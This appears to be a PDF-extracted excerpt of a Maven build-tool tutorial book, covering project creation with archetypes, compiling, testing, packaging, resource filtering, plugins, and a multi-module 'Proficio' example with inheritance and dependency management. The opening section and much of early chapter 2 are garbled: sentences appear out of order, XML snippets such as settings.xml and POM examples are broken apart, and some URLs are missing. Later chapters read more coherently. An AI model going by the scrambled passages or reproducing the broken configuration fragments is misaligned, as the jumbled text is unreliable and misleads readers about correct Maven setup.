if your project has ten web applications. Like the engine in your car or the processor in your laptop. To summarize. artifacts can be downloaded from a secure.1.com/. you don't have to jump through hoops trying to get it to work. which can be managed by Mergere Maestro. you simply change some configurations in Maven. rather than imposing it. 3 Alternatively. all projects referencing this dependency share a single copy of this JAR. Before Maven. If you were coding a web application.6 of the Spring Framework. it doesn't scale easily to support an application with a great number of small components. Maven will attempt to fetch an artifact from the central Maven repository at. simplifies the process of development. modular project arrangements. While this approach works for a few projects. 1. active open-source community that produces software focused on project management.3. Your local repository is one-stop-shopping for all artifacts that you need regardless of how many projects you are building. internal Maven repository.3 If your project's POM contains more than one remote repository. Maven provides such a technology for project management. Maven is a set of standards. Maestro is an Apache License 2. From this point forward.Introducing Maven By default. You don't have to worry about whether or not it's going to work. In other words.0 JARs to every project.mergere. into a lib directory. be a part of your thought process. every project with a POM that references the same dependency will use this single copy installed in your local repository. Storing artifacts in your SCM along with your project may seem appealing.ibiblio. it should rarely. and you would add these dependencies to your classpath. if ever. Maven is a framework. and they shouldn't be versioned in an SCM. Each project relies upon a specific artifact via the dependencies listed in a POM. Once the dependency is satisfied.jar for each project that needs it. Maven will attempt to download an artifact from each remote repository in the order defined in your POM. shielding you from complexity and allowing you to focus on your specific task.8. Declare your dependencies and let Maven take care of details like compilation and testing classpaths. which all depend on version 1. For more information on Maestro please see:. Using Maven is more than just downloading another JAR file and a set of scripts. in the background.2. the common pattern in most projects was to store JAR files in a project's subdirectory. 35 . Maven's Benefits A successful technology takes away burden.0 distribution based on a pre-integrated Maven. Maven is a repository. you don’t store a copy of junit3. it is the adoption of a build life-cycle process that allows you to take your software development to the next level. a useful technology just works. Instead of adding the Spring 2.org/maven2. you would check the 10-20 JAR files. Maven is also a vibrant. there is no need to store the various spring JAR files in your project. the artifact is downloaded and installed in your local repository. With Maven. but it is incompatible with the concept of small. upon which your project relies. Dependencies are not your project's code. and Maven is software.0 by changing your dependency declarations. in doing so. and. Continuum and Archiva build platform. and it is a trivial process to upgrade all ten web applications to Spring 2.
2. Getting Started with Maven

The terrible temptation to tweak should be resisted unless the payoff is really noticeable.
- Jon Bentley and Doug McIlroy
it is assumed that you are a first time Maven user and have already set up Maven on your local system. then please refer to Maven's Download and Installation Instructions before continuing. then you should be all set to create your first Maven project. so for now simply assume that the above settings will work.com/maven2</url> <mirrorOf>central</mirrorOf> </mirror> </mirrors> </settings> In its optimal mode. Now you can perform the following basic check to ensure Maven is working correctly: mvn -version If Maven's version is displayed.xml file with the following content. If you are behind a firewall. then note the URL and let Maven know you will be using a proxy. ask your administrator if there if there is an internal Maven proxy.xml file.1.m2/settings.mycompany. The settings. If you have not set up Maven yet.Better Builds with Maven 2.m2/settings.com</id> <name>My Company's Maven Proxy</name> <url> file will be explained in more detail in the following chapter and you can refer to the Maven Web site for the complete details on the settings. Depending on where your machine is located. it may be necessary to make a few more preparations for Maven to function correctly.mycompany.com</host> <port>8080</port> <username>your-username</username> <password>your-password</password> </proxy> </proxies> </settings> If Maven is already in use at your workplace.xml file with the following content: <settings> <proxies> <proxy> <active>true</active> <protocol>http</protocol> <host>proxy. create a <your-homedirectory>/. To do this. 38 . Maven requires network access. Create a <your-home-directory>/. If there is an active Maven proxy running. Preparing to Use Maven In this chapter. <settings> <mirrors> <mirror> <id>maven. then you will have to set up Maven to understand that.
This chapter will show you how the archetype mechanism works.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.mycompany.8. After the archetype generation has completed. execute the following: C:\mvnbook> mvn archetype:create -DgroupId=com. and that it in fact adheres to Maven's standard directory layout discussed in Chapter 1.1</version> <scope>test</scope> </dependency> </dependencies> </project> At the top level of every project is your pom.xml file. you will notice that the following directory structure has been created. please refer to the Introduction to Archetypes. you will notice that a directory named my-app has been created for the new project. To create the Quick Start Maven project.xml.0</modelVersion> <groupId>com.0. In Maven.app \ -DartifactId=my-app You will notice a few things happened when you executed this command. 39 . you know you are dealing with a Maven project. Creating Your First Maven Project To create your first project.Getting Started with Maven 2. An archetype is defined as an original pattern or model from which all other things of the same kind are made. Whenever you see a directory structure. which looks like the following: <project> <modelVersion>4.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. First. which is combined with some user input to produce a fullyfunctional Maven project. you will use Maven's Archetype mechanism.2. an archetype is a template of a project. but if you would like more information about archetypes. which contains a pom.xml file. and this directory contains your pom.mycompany.apache.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>.
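It is worth noting that the Quick Start archetype is only one of several; for example (my-webapp is just a hypothetical project name), a skeleton web application can be generated by naming a different archetype on the same command:

C:\mvnbook> mvn archetype:create -DgroupId=com.mycompany.app \
    -DartifactId=my-webapp \
    -DarchetypeArtifactId=maven-archetype-webapp

The resulting project has war packaging and a src/main/webapp directory instead of application sources, but it is built with the same commands used throughout the rest of this chapter.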
but the following analysis of the simple compile command shows you the four principles in action and makes clear their fundamental importance in simplifying the development of a project. compile your application sources using the following command: C:\mvnbook\my-app> mvn compile 40 . you are ready to build your project. in order to accomplish the desired task. Change to the <my-app> directory. testing. Compiling Application Sources As mentioned in the introduction. In this first stage you have Java source files only. in one fell swoop.3. you tell Maven what you need. at a very high level. Before you issue the command to compile the application sources. in a declarative way. Now that you have a POM. the site. some application sources. Then. and so on). and deploying the project (source files.Better Builds with Maven Figure 2-1: Directory structure after archetype generation The src directory contains all of the inputs required for building. note that this one simple command encompasses Maven's four foundational principles: • Convention over configuration • Reuse of build logic • Declarative execution • Coherent organization of dependencies These principles are ingrained in all aspects of Maven. and some test sources. but later in the chapter you will see how the standard directory layout is employed for other project content. documenting. various descriptors such as assembly descriptors. configuration files. The <my-app> directory is the base directory. for the my-app project. ${basedir}. 2.
in the first place? You might be guessing that there is some background process that maps a simple command to a particular plugin. [INFO] artifact org.maven. Instead. The next question. The same build logic encapsulated in the compiler plugin will be executed consistently across any number of projects. 41 . In fact. and how Maven invokes the compiler plugin.. inherited from the Super POM. Even the simplest of POMs knows the default location for application sources.plugins:maven-compiler-plugin: checking for updates from central . how was Maven able to decide to use the compiler plugin. in fact. [INFO] [resources:resources] .apache. What actually compiled the application sources? This is where Maven's second principle of “reusable build logic” comes into play. You can. along with its default configuration. application sources are placed in src/main/java. So. By default. is the tool used to compile your application sources. This means you don't have to state this location at all in any of your POMs. is target/classes.plugins:maven-resources-plugin: checking for updates from central .. of course. Although you now know that the compiler plugin was used to compile the application sources.. This default value (though not visible in the POM above) was. if you poke around the standard Maven installation. but there is very little reason to do so.apache. Maven downloads plugins as they are needed. what Maven uses to compile the application sources.Getting Started with Maven After executing this command you should see output similar to the following: [INFO-------------------------------------------------------------------[INFO] Building Maven Quick Start Archetype [INFO] task-segment: [compile] [INFO]------------------------------------------------------------------[INFO] artifact org.. override this default location. The standard compiler plugin. you won't find the compiler plugin since it is not shipped with the Maven distribution. now you know how Maven finds application sources.maven. there is a form of mapping and it is called Maven's default build life cycle.. how was Maven able to retrieve the compiler plugin? After all. The same holds true for the location of the compiled classes which. if you use the default location for application sources. How did Maven know where to look for sources in order to compile them? And how did Maven know where to put the compiled classes? This is where Maven's principle of “convention over configuration” comes into play. by default..
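If you ever do need to override the default source location, the change is a single element in the POM; this is only a sketch (src/java here stands in for whatever layout an existing code base might impose), and as noted above, prefer src/main/java unless you genuinely have no choice:

<build>
  <!-- only needed when application sources are not in src/main/java -->
  <sourceDirectory>src/java</sourceDirectory>
</build>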
0 distribution based on a pre-integrated Maven. For more information on Maestro please see:. From a clean installation of Maven this can take quite a while (in the output above. 42 .Better Builds with Maven The first time you execute this (or any other) command. it took almost 4 minutes with a broadband connection). Maven will download all the plugins and related dependencies it needs to fulfill the command. This implies that all prerequisite phases in the life cycle will be performed to ensure that testing will be successful. you probably have unit tests that you want to compile and execute as well (after all. or where your output should go. it won't download anything new. Again.4 The next time you execute the same command again. Therefore. and eliminates the requirement for you to explicitly tell Maven where any of your sources are. Compiling Test Sources and Running Unit Tests Now that you're successfully compiling your application's sources. which is specified by the standard directory layout.4. Use the following simple command to test: C:\mvnbook\my-app> mvn test 4 Alternatively. Maestro is an Apache License 2. internal Maven repository. artifacts can be downloaded from a secure. programmers always write and execute their own unit tests *nudge nudge. If you're a keen observer you'll notice that using the standard conventions makes the POM above very small. because Maven already has what it needs. simply tell Maven you want to test your sources. As you can see from the output.com/. which can be managed by Mergere Maestro. the compiled classes were placed in target/classes. Maven will execute the command much quicker.mergere. wink wink*). Continuum and Archiva build platform. By following the standard Maven conventions you can get a lot done with very little effort! 2.
.all classes are up to date [INFO] [resources:testResources] [INFO] [compiler:testCompile] Compiling 1 source file to C:\Test\Maven2\test\my-app\target\test-classes . remember that it isn't necessary to run this every time.apache.. and execute the tests. Failures: 0.app. 43 ..mycompany. Time elapsed: 0 sec Results : [surefire] Tests run: 1. Failures: 0. since we haven't changed anything since we compiled last).maven.AppTest [surefire] Tests run: 1. Errors: 0 [INFO]------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO]------------------------------------------------------------------[INFO] Total time: 15 seconds [INFO] Finished at: Thu Oct 06 08:12:17 MDT 2005 [INFO] Final Memory: 2M/8M [INFO]------------------------------------------------------------------- Some things to notice about the output: • Maven downloads more dependencies this time. [INFO] [resources:resources] [INFO] [compiler:compile] [INFO] Nothing to compile . as well as all the others defined before it. compile the tests. If you simply want to compile your test sources (but not execute the tests). • Before compiling and executing the tests.. Now that you can compile the application sources. Errors: 0.plugins:maven-surefire-plugin: checking for updates from central .Getting Started with Maven After executing this command you should see output similar to the following: [INFO]------------------------------------------------------------------[INFO] Building Maven Quick Start Archetype [INFO] task-segment: [test] [INFO]------------------------------------------------------------------[INFO] artifact org. Maven compiles the main code (all these classes are up-to-date. [INFO] [surefire:test] [INFO] Setting reports dir: C:\Test\Maven2\test\my-app\target/surefire-reports ------------------------------------------------------T E S T S ------------------------------------------------------[surefire] Running com. mvn test will always run the compile and test-compile phases first. These are the dependencies and plugins necessary for executing the tests (recall that it already has the dependencies it needs for compiling and won't download them again). how to package your application. you'll want to move on to the next logical step. you can execute the following command: C:\mvnbook\my-app> mvn test-compile However.
Time elapsed: 0.0-SNAPSHOT.0-SNAPSHOT\my-app-1. This is how Maven knows to produce a JAR file from the above command (you'll read more about this later).Better Builds with Maven 2.0-SNAPSHOT. Errors: 0 [INFO] [jar:jar] [INFO] Building jar: <dir>/my-app/target/my-app-1. Failures: 0.m2/repository is the default location of the repository. The directory <your-homedirectory>/.jar to <localrepository>\com\mycompany\app\my-app\1. you'll want to install the artifact (the JAR file) you've generated into your local repository. Packaging and Installation to Your Local Repository Making a JAR file is straightforward and can be accomplished by executing the following command: C:\mvnbook\my-app> mvn package If you take a look at the POM for your project. To install. Take a look in the the target directory and you will see the generated JAR file. Errors: 0. Failures: 0.001 sec Results : [surefire] Tests run: 1.5.app. Now. It can then be used by other projects as a dependency.0-SNAPSHOT.jar [INFO] [install:install] [INFO] Installing c:\mvnbook\my-app\target\my-app-1.jar [INFO]------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO]------------------------------------------------------------------[INFO] Total time: 5 seconds [INFO] Finished at: Tue Oct 04 13:20:32 GMT-05:00 2005 [INFO] Final Memory: 3M/8M [INFO]------------------------------------------------------------------- 44 .mycompany. you will notice the packaging element is set to jar.
and if you've noticed. there are a great number of Maven plugins that work out-of-the-box. This chapter will cover one in particular. it will update the settings rather than starting fresh.java You have now completed the process for setting up. building. you must keep making error-prone additions. simply execute the following command: C:\mvnbook\my-app> mvn site There are plenty of other stand-alone goals that can be executed as well. as it is one of the highly-prized features in Maven. So. there is far more functionality available to you from Maven without requiring any additions to the POM. so it is fresh. to get any more functionality out of an Ant build script.java • **/*TestCase. Perhaps you'd like to generate an IntelliJ IDEA descriptor for the project: C:\mvnbook\my-app> mvn idea:idea This can be run over the top of a previous IDEA project. everything done up to this point has been driven by an 18-line POM. alternatively you might like to generate an Eclipse descriptor: C:\mvnbook\my-app> mvn eclipse:eclipse 45 .java Conversely. and installing a typical Maven project. this POM has enough information to generate a Web site for your project! Though you will typically want to customize your Maven site.java **/Test*. the following tests are included: • • **/*Test. what other functionality can you leverage. In this case. as it currently stands. for example: C:\mvnbook\my-app> mvn clean This will remove the target directory with the old build data before starting. Or. For projects that are built with Maven.Getting Started with Maven Note that the Surefire plugin (which executes the test) looks for tests contained in files with a particular naming convention. Of course. packaging. given Maven's re-usable build logic? With even the simplest POM. Without any work on your part.java **/Abstract*TestCase. In contrast. By default. testing. this covers the majority of tasks users perform. if you're pressed for time and just need to create a basic Web site for your project. the following tests are excluded: • • **/Abstract*Test.
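These phases and stand-alone goals can also be chained in a single invocation, which is handy for getting a clean, reproducible build; for example:

C:\mvnbook\my-app> mvn clean install
C:\mvnbook\my-app> mvn clean site

The first command wipes the previous build output and then rebuilds, tests, packages, and installs the artifact; the second removes the old output and then regenerates the project Web site.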
starting at the base of the JAR. you need to add the directory src/main/resources. In the following example. Figure 2-2: Directory structure after adding the resources directory You can see in the preceding example that there is a META-INF directory with an application. you can package resources within JARs. For this common task. The rule employed by Maven is that all directories or files placed within the src/main/resources directory are packaged in your JAR with the exact same structure. simply by placing those resources in a standard directory structure. If you unpacked the JAR that Maven created you would see the following: 46 .Better Builds with Maven 2. which requires no changes to the POM shown previously. This means that by adopting Maven's standard conventions. is the packaging of resources into a JAR file. Maven again uses the standard directory layout.6.properties file within that directory. Handling Classpath Resources Another common use case. That is where you place any resources you wish to package in the JAR.
MF. simply create the resources and META-INF directories and create an empty file called application. You can create your own manifest if you choose. One simple use might be to retrieve the version of your application. If you would like to try this example.Getting Started with Maven Figure 2-3: Directory structure of the JAR file created by Maven The original contents of src/main/resources can be found starting at the base of the JAR and the application. The pom. as well as a pom. should the need arise. Operating on the POM file would require you to use Maven utilities. 47 .properties file.xml and pom.xml and pom.properties files are packaged up in the JAR so that each artifact produced by Maven is self-describing and also allows you to utilize the metadata in your own application. but Maven will generate one by default if you don't. These come standard with the creation of a JAR in Maven.properties file is there in the META-INF directory. but the properties can be utilized using the standard Java APIs. Then run mvn install and examine the jar file in the target directory. You will also notice some other files like META-INF/MANIFEST.xml inside.
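One hedged sketch of the "retrieve the version of your application" idea mentioned above: Maven writes pom.properties under META-INF/maven/<groupId>/<artifactId>/ inside the JAR, so application code can read it with the standard Java APIs. The class below assumes the book's com.mycompany.app:my-app coordinates; substitute your own.

package com.mycompany.app;

import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;

public class VersionInfo
{
    /** Returns the version Maven recorded in pom.properties, or "unknown" if it cannot be read. */
    public static String getVersion()
    {
        InputStream is = VersionInfo.class.getResourceAsStream(
            "/META-INF/maven/com.mycompany.app/my-app/pom.properties" );
        if ( is == null )
        {
            // running outside the packaged JAR, for example from an IDE
            return "unknown";
        }
        try
        {
            Properties props = new Properties();
            props.load( is );
            return props.getProperty( "version", "unknown" );
        }
        catch ( IOException e )
        {
            return "unknown";
        }
        finally
        {
            try { is.close(); } catch ( IOException ignored ) { }
        }
    }
}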
. At this point you have a project directory structure that should look like the following: Figure 2-4: Directory structure after adding test resources In a unit test. except place resources in the src/test/resources directory.1.getResourceAsStream( "/test.. follow the same pattern as you do for adding resources to the JAR.. // Do something with the resource [.. Handling Test Classpath Resources To add resources to the classpath for your unit tests.] // Retrieve resource InputStream is = getClass().Better Builds with Maven 2.properties" ). you could use a simple snippet of code like the following for access to the resource required for testing: [.] 48 .6.
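Pulled together into a complete unit test, the snippet above might look like the following; this is only an illustration in the JUnit 3.8 style used elsewhere in the chapter, and it assumes a src/test/resources/test.properties file containing a hypothetical entry hello=world:

package com.mycompany.app;

import java.io.InputStream;
import java.util.Properties;

import junit.framework.TestCase;

public class ResourceTest extends TestCase
{
    public void testResourceIsOnTheTestClasspath() throws Exception
    {
        // Retrieve the resource copied from src/test/resources
        InputStream is = getClass().getResourceAsStream( "/test.properties" );
        assertNotNull( "test.properties should be on the test classpath", is );

        // Do something with the resource: load it and check the hypothetical entry
        Properties props = new Properties();
        props.load( is );
        is.close();
        assertEquals( "world", props.getProperty( "hello" ) );
    }
}

Running mvn test copies the file to target/test-classes before the test executes, so the lookup succeeds without any extra configuration.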
2. To accomplish this in Maven.plugins</groupId> <artifactId>maven-jar-plugin</artifactId> <configuration> <archive> <manifestFile>META-INF/MANIFEST. you can use the follow configuration for the maven-jarplugin: <plugin> <groupId>org. Filtering Classpath Resources Sometimes a resource file will need to contain a value that can be supplied at build time only.1</version> <scope>test</scope> </dependency> </dependencies> <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> </project> 49 . a property defined in an external properties file.6.xml. you can filter your resource files dynamically by putting a reference to the property that will contain the value into your resource file using the syntax ${<property name>}. or a system property.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.0.Getting Started with Maven To override the manifest file yourself.xml.0</modelVersion> <groupId>com.maven.mycompany.8.apache.apache. To have Maven filter resources when copying. The property can be either one of the values defined in your pom.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1. simply set filtering to true for the resource directory in your pom.MF</manifestFile> </archive> </configuration> </plugin> 2. a value defined in the user's settings.xml: <project> <modelVersion>4.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>.
version=${project.xml. all you need to do is add a reference to this external file in your pom. and resource elements . add a reference to this new file in the pom. In fact. So ${project.] <build> <filters> <filter>src/main/filters/filter.xml file: [. when the built project is packaged. create an src/main/resources/application. First. you can execute the following command (process-resources is the build life cycle phase where the resources are copied and filtered): mvn process-resourcesThe application. resources. which weren't there before.properties my.build.properties: # filter.properties file. To reference a property defined in your pom.name=${project. which will eventually go into the JAR looks like this: # application.properties application. In addition.have been added.xml..value=hello! Next.] 50 .version} refers to the version of the project.properties application. the property name uses the names of the XML elements that define the value.. ${project. and ${project. To continue the example..name} application.xml to override the default value for filtering and set it to true. whose values will be supplied when the resource is filtered as follows: # application.0-SNAPSHOT To reference a property defined in an external file.finalName} refers to the final name of the file created.properties file under target/classes.filter.version} With that in place. the POM has to explicitly state that the resources are located in the src/main/resources directory.Better Builds with Maven You'll notice that the build. create an external properties file and call it src/main/filters/filter.properties</filter> </filters> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> [.which weren't there before .name} refers to the name of the project.version=1.name=Maven Quick Start Archetype application.. any element in your POM is available when filtering resources. All of this information was previously provided as default values and now must be added to the pom.
either the system properties built into Java (like java.version} message=${my.name} application.prop=hello again" 51 .value> </properties> </project> Filtering resources can also retrieve values from system properties.apache.properties file to look like the following: # application.Getting Started with Maven Then. the application.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.properties file as follows: # application.filter.prop=${command.filter.version=${project.line. you could have defined it in the properties section of your pom.line.filter.line.version} command.8.filter.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.1</version> <scope>test</scope> </dependency> </dependencies> <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> <properties> <my. when you execute the following command (note the definition of the command.value>hello</my.home). change the application. To continue the example.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>{project.0</modelVersion> <groupId>com.line.prop property on the command line).version or user.value} The next execution of the mvn process-resources command will put the new property value into application.properties.version=${java.properties application. mvn process-resources "-Dcommand.xml and you'd get the same effect (notice you don't need the references to src/main/filters/filter.properties file will contain the values from the system properties.prop} Now. or properties defined on the command line using the standard Java -D parameter. As an alternative to defining the my.value property in an external file.0. add a reference to this property in the application.properties java.mycompany.properties either):<project> <modelVersion>4.
6.. <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> <excludes> <exclude>images/**</exclude> </excludes> </resource> <resource> <directory>src/main/resources</directory> <includes> <include>images/**</include> </includes> </resource> </resources> </build> . In addition you would add another resource entry. and an inclusion of your images directory. with filtering disabled. The build element would look like the following: <project> ..3. Preventing Filtering of Binary Resources Sometimes there are classpath resources that you want to include in your JAR..Better Builds with Maven 2. for example image files. then you would create a resource entry to handle the filtering of resources with an exclusion for the resources you wanted unfiltered. but you do not want them filtered. </project> 52 . This is most often the case with binary resources.. If you had a src/main/resources/images that you didn't want to be filtered.
2.7. Using Maven Plugins

As noted earlier in the chapter, to customize the build for a Maven project, you must include additional Maven plugins, or configure parameters for the plugins already included in the build. For example, you may want to configure the Java compiler to allow JDK 5.0 sources. This is as simple as adding the following to your POM:

  <project>
    ...
    <build>
      <plugins>
        <plugin>
          <groupId>org.apache.maven.plugins</groupId>
          <artifactId>maven-compiler-plugin</artifactId>
          <version>2.0</version>
          <configuration>
            <source>1.5</source>
            <target>1.5</target>
          </configuration>
        </plugin>
      </plugins>
    </build>
    ...
  </project>

You'll notice that all plugins in Maven 2 look very similar to a dependency, and in some ways they are. If the plugin is not present on your local system, it will be downloaded and installed automatically, in much the same way that a dependency would be handled.

To illustrate the similarity between plugins and dependencies, the groupId and version elements have been shown, but in most cases these elements are not required. If you do not specify a groupId, then Maven will default to looking for the plugin with the org.apache.maven.plugins or the org.codehaus.mojo groupId label. You can specify an additional groupId to search within your POM, or settings.xml. If you do not specify a version, then Maven will attempt to use the latest released version of the specified plugin. This is often the most convenient way to use a plugin, but you may want to specify the version of a plugin to ensure reproducibility. For the most part, plugin developers take care to ensure that new versions of plugins are backward compatible, so you are usually OK with the latest release; but if you find something has changed, you can lock down a specific version.

In the above case, the compiler plugin is already used as part of the build process and this just changes the configuration. The configuration element applies the given parameters to every goal from the compiler plugin.
If you want to find out what a plugin's configuration options are, use the mvn help:describe command. For example, to see the options for the maven-compiler-plugin shown previously, use the following command:

  mvn help:describe -DgroupId=org.apache.maven.plugins \
      -DartifactId=maven-compiler-plugin -Dfull=true

You can also find out what plugin configuration is available by using the Maven Plugin Reference section at http://maven.apache.org/plugins/ and navigating to the plugin and goal you are using.

2.8. Summary

After reading Chapter 2, you should be up and running with Maven. In eighteen pages, you've seen how you can use Maven to build your project; you've learned a new language and you've taken Maven for a test drive. If someone throws a Maven project at you, you'll know how to use the basic features of Maven: creating a project, compiling a project, testing a project, and packaging a project. You should also have some insight into how Maven handles dependencies and provides an avenue for customization using Maven plugins. By learning how to build a Maven project, you have gained access to every single project using Maven.

If you were looking for just a build tool, you could stop reading this book now, although you might want to refer to the next chapter for more information about customizing your build to fit your project's unique needs. If you are interested in learning how Maven builds upon the concepts described in the Introduction and obtaining a deeper working knowledge of the tools introduced in Chapter 2, read on. The next few chapters provide you with the how-to guidelines to customize Maven's behavior and use Maven to manage interdependent software projects.
3. Creating Applications with Maven

  - Edward V. Berard
3.1. Introduction

In the second chapter you stepped though the basics of setting up a simple project. Now you will delve in a little deeper, using a real-world example. In this chapter, you are going to learn about some of Maven's best practices and advanced uses by working on a small application to manage frequently asked questions (FAQ). You will be guided through the specifics of setting up an application and managing that application's Maven structure. The application that you are going to create is called Proficio, which is Latin for "help".

3.2. Setting Up an Application Directory Structure

In setting up Proficio's directory structure, it is important to keep in mind that Maven emphasizes the practice of standardized and modular builds. The guiding principle in determining how best to decompose your application is called the Separation of Concerns (SoC). SoC refers to the ability to identify, encapsulate, and operate on the pieces of software that are relevant to a particular concept, goal, task, or purpose. Concerns are the primary motivation for organizing and decomposing software into smaller, more manageable and comprehensible parts, each of which addresses one or more specific concerns. The natural outcome of this practice is the generation of discrete and coherent components, which enable code reusability - a key goal for every software development project.

As such, you will see that the Proficio sample application is made up of several Maven modules:

• Proficio API: The application programming interface for Proficio, which consists of a set of interfaces. The interfaces for the APIs of major components, like the store, are also kept here.
• Proficio CLI: The code which provides a command line interface to Proficio.
• Proficio Core: The implementation of the API.
• Proficio Model: The data model for the Proficio application, which consists of all the classes that will be used by Proficio as a whole.
• Proficio Stores: The module which itself houses all the store modules. Proficio has a very simple memory-based store and a simple XStream-based store.

These are default naming conventions that Maven uses, but you are free to name your modules in any fashion your team decides. The only real criterion to adhere to is that your team agrees to and uses a single naming convention. In doing so, everyone on the team needs to clearly understand the convention, and be able to easily identify what a particular module does simply by looking at its name. So, let's start by discussing the ideal directory structure for Proficio.
In examining the top-level POM for Proficio, you can see in the modules element all the sub-modules that make up the Proficio application. A module is a reference to another Maven project, which really means a reference to another POM. This setup is typically referred to as a multi-module build, and this is how it looks in the top-level Proficio POM:

  <project>
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.apache.maven.proficio</groupId>
    <artifactId>proficio</artifactId>
    <packaging>pom</packaging>
    <version>1.0-SNAPSHOT</version>
    <name>Maven Proficio</name>
    <url>http://maven.apache.org</url>
    ...
    <modules>
      <module>proficio-model</module>
      <module>proficio-api</module>
      <module>proficio-core</module>
      <module>proficio-stores</module>
      <module>proficio-cli</module>
    </modules>
    ...
  </project>

An important feature to note in the POM above is the value of the version element, which you can see is 1.0-SNAPSHOT. For an application that has multiple modules, it is very common to release all the sub-modules together, so it makes sense that all the modules have a common application version. It is recommended that you specify the application version in the top-level POM and use that version across all the modules that make up your application.

You should also take note of the packaging element, which in this case has a value of pom. For POMs that contain modules, the packaging type must be set to the value pom: this tells Maven that you're going to be walking through a set of modules in a structure similar to the example being covered here.

Currently there is some variance on the Maven web site when referring to directory structures that contain more than one Maven project. In Maven 1.x these were commonly referred to as multi-project builds, and some of this vestigial terminology carried over to the Maven 2.x documentation, but the Maven team is trying to consistently refer to these setups as multi-module builds now. If you were to look at Proficio's directory structure you would see the following:
Figure 3-1: Proficio directory structure

You may have noticed that the module elements in the POM match the names of the directories in the Proficio directory structure shown above. The interesting thing here is that we have another project with a packaging type of pom: the proficio-stores module. If you take a look at the POM for the proficio-stores module you will see a set of modules contained therein:

  <project>
    <parent>
      <groupId>org.apache.maven.proficio</groupId>
      <artifactId>proficio</artifactId>
      <version>1.0-SNAPSHOT</version>
    </parent>
    <modelVersion>4.0.0</modelVersion>
    <artifactId>proficio-stores</artifactId>
    <name>Maven Proficio Stores</name>
    <packaging>pom</packaging>
    <modules>
      <module>proficio-store-memory</module>
      <module>proficio-store-xstream</module>
    </modules>
  </project>
You can nest sets of projects like this to any level, organizing your projects in groups according to concern, just as has been done with Proficio's multiple storage mechanisms.

3.3. Using Project Inheritance

One of the most powerful features in Maven is project inheritance. Using project inheritance allows you to do things like state your organizational information, state your deployment information, or state your common dependencies - all in a single place. Being the observant user, you have probably taken a peek at all the POMs in each of the projects that make up the Proficio project and noticed the following at the top of each of the POMs:

  ...
  <parent>
    <groupId>org.apache.maven.proficio</groupId>
    <artifactId>proficio</artifactId>
    <version>1.0-SNAPSHOT</version>
  </parent>
  ...

This is the snippet in each of the POMs that lets you draw on the resources stated in the specified top-level POM, and from which you can inherit down to the level required - enabling you to add resources where it makes sense in the hierarchy of your projects.

Let's examine a case where it makes sense to put a resource in the top-level POM, using our top-level POM for the sample Proficio application. If you look at the top-level POM for Proficio, you will see that in the dependencies section there is a declaration for JUnit version 3.8.1. In this case the assumption being made is that JUnit will be used for testing in all our child projects. The dependency is stated as follows:

  <project>
    ...
    <dependencies>
      <dependency>
        <groupId>junit</groupId>
        <artifactId>junit</artifactId>
        <version>3.8.1</version>
        <scope>test</scope>
      </dependency>
    </dependencies>
    ...
  </project>

What specifically happens for each child POM is that each one inherits the dependencies section of the top-level POM. So, by stating the dependency in the top-level POM once, you never have to declare this dependency again, in any of your child POMs. If you take a look at the POM for the proficio-core module you will see the following (note: there is no visible dependency declaration for JUnit):

  <project>
    <parent>
      <groupId>org.apache.maven.proficio</groupId>
      <artifactId>proficio</artifactId>
      <version>1.0-SNAPSHOT</version>
    </parent>
    <modelVersion>4.0.0</modelVersion>
    <artifactId>proficio-core</artifactId>
    <packaging>jar</packaging>
    <name>Maven Proficio Core</name>
    <dependencies>
      <dependency>
        <groupId>org.apache.maven.proficio</groupId>
        <artifactId>proficio-api</artifactId>
      </dependency>
      <dependency>
        <groupId>org.codehaus.plexus</groupId>
        <artifactId>plexus-container-default</artifactId>
      </dependency>
    </dependencies>
  </project>
In order for you to see what happens during the inheritance process, you will need to use the handy mvn help:effective-pom command. This command will show you the final result for a target POM. After you move into the proficio-core module directory and run the command, take a look at the resulting POM: you will see the JUnit version 3.8.1 dependency:

  <project>
    ...
    <dependencies>
      ...
      <dependency>
        <groupId>junit</groupId>
        <artifactId>junit</artifactId>
        <version>3.8.1</version>
        <scope>test</scope>
      </dependency>
      ...
    </dependencies>
    ...
  </project>

You will have noticed that the POM displayed by mvn help:effective-pom is bigger than you expected. Remember from Chapter 2 that the Super POM sits at the top of the inheritance hierarchy; so in this case, the proficio-core project inherits from the top-level Proficio project, which in turn inherits from the Super POM. The effective POM includes everything, and is useful to view when trying to figure out what is going on when you are having problems.

3.4. Managing Dependencies

When you are building applications you typically have a number of dependencies to manage, and that number only increases over time, making dependency management difficult to say the least. When you write applications which consist of multiple, individual projects, it is likely that some of those projects will share common dependencies. When this happens, it is critical that the same version of a given dependency is used for all your projects, so that the final application works correctly. You don't want, for example, to end up with multiple versions of a dependency on the classpath when your application executes, as the results can be far from desirable. You want to make sure that all the versions, of all your dependencies, across all of your projects are in alignment, so that your testing accurately reflects what you will deploy as your final result. Maven's strategy for dealing with this problem is to combine the power of project inheritance with specific dependency management elements in the POM. In order to manage, or align, versions of dependencies across several projects, you use the dependency management section in the top-level POM of an application.
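Whichever way you align versions, mvn help:effective-pom (introduced above) is the quickest way to verify what each module actually ends up with. Its output can run to several hundred lines, so capturing it in a file makes it easier to compare against the top-level POM; the redirection below is just a convenience sketch and the file name is arbitrary:

  cd proficio-core
  mvn help:effective-pom > effective-pom.txt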
To illustrate how this mechanism works, let's look at the dependency management section of the Proficio top-level POM:

  <project>
    ...
    <dependencyManagement>
      <dependencies>
        <dependency>
          <groupId>org.apache.maven.proficio</groupId>
          <artifactId>proficio-model</artifactId>
